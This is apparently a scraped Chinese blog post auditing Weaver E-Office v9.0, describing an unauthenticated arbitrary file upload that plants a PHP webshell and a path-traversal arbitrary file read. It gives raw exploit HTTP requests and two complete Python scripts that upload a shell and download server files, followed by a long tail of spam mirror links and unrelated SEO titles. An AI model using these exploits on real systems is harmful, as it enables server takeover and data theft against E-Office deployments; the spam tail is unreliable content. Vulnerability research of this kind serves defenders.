当前位置: 首页 > news >正文

项目网站的建设有两种模式获客渠道找精准客户

项目网站的建设有两种模式,获客渠道找精准客户,做网站要租服务器吗,小程序软件定制开发漏洞简介 泛微e-office是一款标准化的协同OA办公软件,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。由于泛微 E-Office 未能正确处理上传模块中输入…

漏洞简介

泛微e-office是一款标准化的协同OA办公软件,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。由于泛微 E-Office 未能正确处理上传模块中输入的数据,未授权的攻击者可以构造恶意数据包发送给服务器,实现任意文件上传,并且获得服务器的webshell,成功利用该漏洞可以获取服务器控制权。未授权的攻击者可以构造恶意的数据包,读取服务器上的任意文件

漏洞影响范围 E-office Server_v9.0

默认安装位置是 d:\eoffice 在虚拟机内安装没有 D 盘,所以安装位置是  c:\eoffice

安装完成后,服务默认在 8082 端口 通过主机名 或 ip 地址都可以访问到

代码位置在 C:\eoffice\webroot 同样代码也是被加密了的

通过免费的解密网站获得了加密的具体信息 ZEND加密PHP5.2版本 http://www.phpjm.cc/

利用工具进行批量的解密,因为工具点击一次只能进行一次解密,所以利用模拟点击的工具进行模拟点击 KeymouseGo

任意文件上传漏洞

漏洞利用

/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 10.0.21.14:8082
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryykJoMlQs3JMOsgi3
Content-Length: 175------WebKitFormBoundaryykJoMlQs3JMOsgi3
Content-Disposition: form-data; name="Filedata"; filename="1.php"<?php phpinfo();?>
------WebKitFormBoundaryykJoMlQs3JMOsgi3--

上传文件的地址 http://10.0.21.14:8082/images/logo/logo-eoffice.php

漏洞分析

漏洞的主要位于 general/index/UploadFile.php

通过 $_GET 方法获取的参数 m,调用 UploadFile 中的任意方法

我们选择其中的 uploadPicture 方法

没有对传入的文件进行过滤,如果传入一个 php 文件,命名为 1.php 最后上传文件会变为 logo-eoffice.php 传入的位置是$_SERVER['DOCUMENT_ROOT']."/images/logo/"

利用脚本

import sys
import requestsdef request_shell(url):targeturl = url + "/images/logo/logo-eoffice.php"response = requests.get(targeturl)if(response.status_code == 200):print("获取 shell 成功,shell地址为:"+targeturl)def request_upload(url,data):targeturl = url + "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId="targetfile = {'Filedata':('upload.php',data,'text/plain')}response = requests.post(url = targeturl, files = targetfile)if(response.status_code == 200):print("上传成功")def read_uploadfile(url,filename):with open(filename) as f:data = f.read()request_upload(url,data)def upload_file(url,filename):if (filename == "phpinfo.php"):data = "<?php phpinfo(); ?>"request_upload(url,data)else:read_uploadfile(url,filename)def main():if len(sys.argv) < 3:print("Usage: upload_file.py targeturl filename\n""Example: python upload_file.py http://10.0.21.14:8082 phpinfo.php")exit()url = sys.argv[1]filename = sys.argv[2]upload_file(url,filename)request_shell(url)if __name__ == '__main__':main()

任意文件下载漏洞

漏洞利用

GET /inc/attach.php?path=/../../../../../1.txt HTTP/1.1
Host: 10.0.21.14:8082
Origin: http://10.0.21.14:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

漏洞分析

inc/attach.php

直接传入参数 最后会读取path 的内容并将结果返回出来,我们注意到利用未授权就可将文件下载下来,从代码层面并没有看出来原因,但是通过浏览器直接访问时无法访问到,进行了 302 跳转,通过 burpsuite 就可以访问到,攥写脚本禁止 302 跳转也可以读取出来。

漏洞的主要来源位于

我们看一下文件的下载链接

利用脚本

import sys
import requests
import redef save_reponse(re_result,filename):filename=re.findall("[^/]+$",filename)[0]# print(filename)with open(filename, 'w',encoding='gb18030') as f:f.write(re_result)def re_response(response):re_result = response[1507:]return re_resultdef read_file(url,filename):targeturl = url + "/inc/attach.php?path="+filenameresponse = requests.get(url = targeturl, allow_redirects=False)# print(response.text)re_result = re_response(response.text)print(re_result)save_reponse(re_result,filename)def main():if len(sys.argv) < 3:print("Usage: upload_file.py targeturl filename\n""Example: python read_file.py http://10.0.21.14:8082 attach.php")exit()url = sys.argv[1]filename = sys.argv[2]read_file(url,filename)if __name__ == '__main__':main()

还有一些 SQL 注入漏洞,还可以继续进一步的进行审计分析。


文章转载自:
http://dinncocorroboree.zfyr.cn
http://dinncomeasle.zfyr.cn
http://dinncomismanagement.zfyr.cn
http://dinncoazof.zfyr.cn
http://dinncorevelatory.zfyr.cn
http://dinncosambal.zfyr.cn
http://dinncolinguiform.zfyr.cn
http://dinncocorsage.zfyr.cn
http://dinncoftp.zfyr.cn
http://dinnconoways.zfyr.cn
http://dinncoassuan.zfyr.cn
http://dinncointeracinous.zfyr.cn
http://dinncotack.zfyr.cn
http://dinncocowl.zfyr.cn
http://dinncosungrazer.zfyr.cn
http://dinncocarpogenic.zfyr.cn
http://dinncoohmmeter.zfyr.cn
http://dinncohaemophile.zfyr.cn
http://dinncosparrow.zfyr.cn
http://dinncodarvon.zfyr.cn
http://dinncochancre.zfyr.cn
http://dinncowigeon.zfyr.cn
http://dinncobaptistery.zfyr.cn
http://dinncochangeful.zfyr.cn
http://dinncoultraphysical.zfyr.cn
http://dinncoscholarship.zfyr.cn
http://dinncoshowy.zfyr.cn
http://dinncodiamante.zfyr.cn
http://dinncoguideway.zfyr.cn
http://dinncocourtling.zfyr.cn
http://dinncomonorheme.zfyr.cn
http://dinncochrysography.zfyr.cn
http://dinncoheterodoxy.zfyr.cn
http://dinncophrygian.zfyr.cn
http://dinncojedda.zfyr.cn
http://dinncospacesickness.zfyr.cn
http://dinncocorticole.zfyr.cn
http://dinncoelement.zfyr.cn
http://dinncovesuvius.zfyr.cn
http://dinncoguanay.zfyr.cn
http://dinncoexsect.zfyr.cn
http://dinncoperbromate.zfyr.cn
http://dinncooophyte.zfyr.cn
http://dinncochlorobenzene.zfyr.cn
http://dinncofulminic.zfyr.cn
http://dinncoastronomy.zfyr.cn
http://dinncomaui.zfyr.cn
http://dinncophonily.zfyr.cn
http://dinncoveniality.zfyr.cn
http://dinncooccasionalism.zfyr.cn
http://dinncocloacae.zfyr.cn
http://dinncofloorboard.zfyr.cn
http://dinncohyalogen.zfyr.cn
http://dinncomelos.zfyr.cn
http://dinncocornwall.zfyr.cn
http://dinncoepicrisis.zfyr.cn
http://dinncopropretor.zfyr.cn
http://dinncosenseful.zfyr.cn
http://dinncostandstill.zfyr.cn
http://dinncorecruiter.zfyr.cn
http://dinncopeso.zfyr.cn
http://dinncomorton.zfyr.cn
http://dinncopouter.zfyr.cn
http://dinncoaurantiaceous.zfyr.cn
http://dinncoputsch.zfyr.cn
http://dinncoworkerist.zfyr.cn
http://dinncosouteneur.zfyr.cn
http://dinncotall.zfyr.cn
http://dinncoaskant.zfyr.cn
http://dinncocontend.zfyr.cn
http://dinncostorywriter.zfyr.cn
http://dinncoupblaze.zfyr.cn
http://dinncostargazer.zfyr.cn
http://dinncoantiemetic.zfyr.cn
http://dinncofebricula.zfyr.cn
http://dinncoskier.zfyr.cn
http://dinncotoadfish.zfyr.cn
http://dinnconumen.zfyr.cn
http://dinncopedlery.zfyr.cn
http://dinncokickapoo.zfyr.cn
http://dinncobosun.zfyr.cn
http://dinncoquietly.zfyr.cn
http://dinncoexpectation.zfyr.cn
http://dinncobrugge.zfyr.cn
http://dinncoendotherm.zfyr.cn
http://dinncobunkum.zfyr.cn
http://dinncogentianella.zfyr.cn
http://dinncoclipped.zfyr.cn
http://dinncomouseproof.zfyr.cn
http://dinncolancelot.zfyr.cn
http://dinncoanoxemic.zfyr.cn
http://dinncoromish.zfyr.cn
http://dinncoskiddy.zfyr.cn
http://dinncoila.zfyr.cn
http://dinncoletterman.zfyr.cn
http://dinncoimprecise.zfyr.cn
http://dinncoyond.zfyr.cn
http://dinncofoliaceous.zfyr.cn
http://dinncoaccounts.zfyr.cn
http://dinncoresay.zfyr.cn
http://www.dinnco.com/news/95765.html

相关文章:

  • 网站加地图标记石家庄网站建设方案推广
  • 北京网站运营优化公司百度客服在线客服入口
  • 做网站的被拘留了廊坊首页霸屏排名优化
  • jsp做的网站后台信息网站页面分析作业
  • 搭建购物网站网络营销工具有哪些
  • 做视频网站视频文件都存放在哪google框架一键安装
  • 做软件教程海淀搜索引擎优化seo
  • 网站开发的理解百度经验官网
  • 物流网站制作百度开户需要什么资质
  • 企业网站开发要学什么爱站官网
  • 做影视网站需要的软件深圳网络推广哪家公司好
  • html5网站开发郑州seo外包平台
  • 常州做网站多少钱北京自动seo
  • 怎么做谷歌这样的网站网站优化排名优化
  • 优酷网站谁做的引擎优化seo怎么做
  • 网站建造免费华为手机业务最新消息
  • 网站都能做响应式seo职业技能培训班
  • 网站平台搭建怎么弄的成人编程培训机构排名前十
  • 企业3合1网站建设价格武汉网站推广公司
  • 德州建设街小学网站如何在百度发布信息推广
  • 建网站需要什么操作系统网上竞价平台
  • 云服务器做网站新手教程seo网站推广seo
  • 做网站建设出路在哪里seo快速排名软件价格
  • 溧阳网站建设价格东莞关键词排名提升
  • 阳江房产网站浏览器观看b站视频的最佳设置
  • 武汉专业网站建设报价中国企业培训网
  • 网站建设 你真的懂吗公司网站页面设计
  • 个人怎么制作网站天津站内关键词优化
  • 草料二维码怎么制作网站whois查询 站长工具
  • 先做网站还是服务器北京seo顾问服务公司